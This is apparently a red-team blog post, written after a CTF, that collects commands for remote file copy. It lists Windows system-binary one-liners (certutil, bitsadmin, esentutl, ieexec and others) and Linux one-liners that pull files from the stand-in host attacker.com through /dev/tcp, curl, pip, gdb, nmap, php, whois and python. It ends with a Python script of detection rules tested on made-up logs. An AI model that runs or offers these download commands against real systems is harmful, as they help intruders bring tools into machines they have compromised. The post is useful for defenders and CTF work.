Remote File Copy all the things!

Background

While playing a CTF I had to copy files from one machine to the next, but I was not able to do so with a non-standard binary. A few weeks or months ago (I really don't remember) I watched a talk where these two projects were presented. These projects basically showed a lot of research done on system binaries that can be used during Red-Team activities. Of course these can also be added to your forensic artefact list should you be interested in preventing them from being used.

Windows

Linux


From these websites I found multiple other binaries that can do remote file copy and so much more. I highly recommend looking them up. To make it easier for myself (and maybe you?) the next time we need them, I copied some of the commands into this post for easy access. (All credits go to the researchers of those two great projects.)

Windows

bitsadmin

bitsadmin /create 1
bitsadmin /addfile 1 <url>/file.ext <output Folder>\file.ext
bitsadmin /RESUME 1
bitsadmin /complete 1

certutil

certutil.exe -urlcache -split -f <url>/file.ext <outputFile.ext>

Esentutl

esentutl.exe /y \\<url without www>\<file.ext> /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr

findstr /V /L mip9-2rnuar;gl934gmlkj \\webdavserver\folder\file.exe > c:\ADS\file.exe

Hh

HH.exe http://some.url/script.ps1

Ieexec

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

Replace

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A



Linux

Bash

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'

Fetch a remote file over a raw TCP connection. Run nc -l -p 12345 < "file_to_send" on the attacker box to serve the file.

export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'

CPAN

export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();

curl

URL=http://attacker.com/file_to_get
LFILE=file_to_save
curl $URL -o $LFILE

easy_install

export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo "import os;
os.execl('$(command -v python)', '$(command -v python)', '-c', \"\"\"import sys;
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve('$URL', '$LFILE')\"\"\")" > $TF/setup.py
pip install $TF

GDB

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
gdb -nx -ex 'python import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' -ex quit

NMAP

Run nc target.com 12345 < "file_to_send" on the attacker box; the target listens on LPORT and writes whatever it receives to LFILE.

export LPORT=12345
export LFILE=file_to_save
TF=$(mktemp)
echo 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  local d,x=c:receive("*a");
  c:close();
  local f=io.open(os.getenv("LFILE"), "wb");
  f:write(d);
  io.close(f);' > $TF
nmap --script=$TF

php

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

whois

Run nc -l -p 12345 < "file_to_send" on the attacker box
The file has instances of $'\x0d' stripped.

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"

Run base64 "file_to_send" | nc -l -p 12345 on the attacker box

RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"

Python

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])'
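Since the same commands double as forensic artefacts, here is an added example (not part of the original post or of either project) that turns the Windows and Linux commands above into simple regex detection rules and runs them over constructed process-creation records; the hosts, users, paths and the "CMD=" record format are assumptions made up for the demo.

```python
import re
from typing import List, Tuple

# Added example, not from the original post: detection rules for the remote
# file copy commands listed above, run over constructed process-creation
# records. Hosts, users and paths in SAMPLE_LOG are made up for the demo.
UNC = r"\\\\[^\s\\]+\\"   # \\host\ prefix of a UNC / WebDAV path
URL = r"https?://"
RULES = [  # (rule name, regex over the process command line)
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin_addfile", re.compile(r"\bbitsadmin\b.*/addfile\b.*" + URL, re.I)),
    ("esentutl_unc_copy", re.compile(r"\besentutl(\.exe)?\b.*/y\s+" + UNC, re.I)),
    ("unc_copy_lolbin",   re.compile(r"\b(expand|extrac32|findstr|makecab|replace)(\.exe)?\b.*" + UNC, re.I)),
    ("url_launch_lolbin", re.compile(r"\b(hh|ieexec)(\.exe)?\b.*" + URL, re.I)),
    ("bash_dev_tcp",      re.compile(r"/dev/tcp/")),
    ("whois_raw_socket",  re.compile(r"\bwhois\b.*-h\s+\S+.*-p\s+\d+")),
    ("php_fetch_url",     re.compile(r"\bphp\b.*\s-r\b.*file_get_contents")),
    ("nmap_tmp_script",   re.compile(r"\bnmap\b.*--script=/tmp/")),
]

def classify(cmdline: str) -> List[str]:
    """Names of every rule that matches a single process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(log_lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Scan records of the form '<time> <host> <user> CMD=<command line>';
    return (host, command line, matched rules) for each flagged record."""
    flagged = []
    for line in log_lines:
        head, sep, cmd = line.partition("CMD=")
        if not sep:
            continue                      # not a process-creation record
        hits = classify(cmd)
        if hits:
            flagged.append((head.split()[1], cmd, hits))
    return flagged

SAMPLE_LOG = [  # constructed sample records
    "2024-05-01T10:00:01Z ws01 alice CMD=certutil.exe -urlcache -split -f http://files.example.test/t.exe C:\\Users\\Public\\t.exe",
    "2024-05-01T10:00:05Z ws01 alice CMD=notepad.exe C:\\Users\\alice\\notes.txt",
    "2024-05-01T10:01:10Z ws02 bob CMD=bitsadmin /addfile 1 http://files.example.test/a.bin C:\\Users\\Public\\a.bin",
    "2024-05-01T10:02:00Z ws02 bob CMD=findstr /V /L zzzz \\\\files.example.test\\share\\x.exe",
    "2024-05-01T10:03:00Z srv01 root CMD=bash -c cat < /dev/tcp/files.example.test/12345 > /tmp/x",
    "2024-05-01T10:03:30Z srv01 root CMD=whois -h files.example.test -p 12345",
    "2024-05-01T10:04:00Z srv01 www CMD=php -r echo 1;",
]

if __name__ == "__main__":
    for host, cmd, hits in scan(SAMPLE_LOG):
        print(f"{host}: {', '.join(hits)} :: {cmd}")
```

The rules are deliberately loose (any UNC source path for the copy utilities, any -h/-p pair for whois), so tune them against your own baseline before alerting on them.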
#Red-Team #MITRE-Attack:T1105 #Remote File Copy #Lateral Movement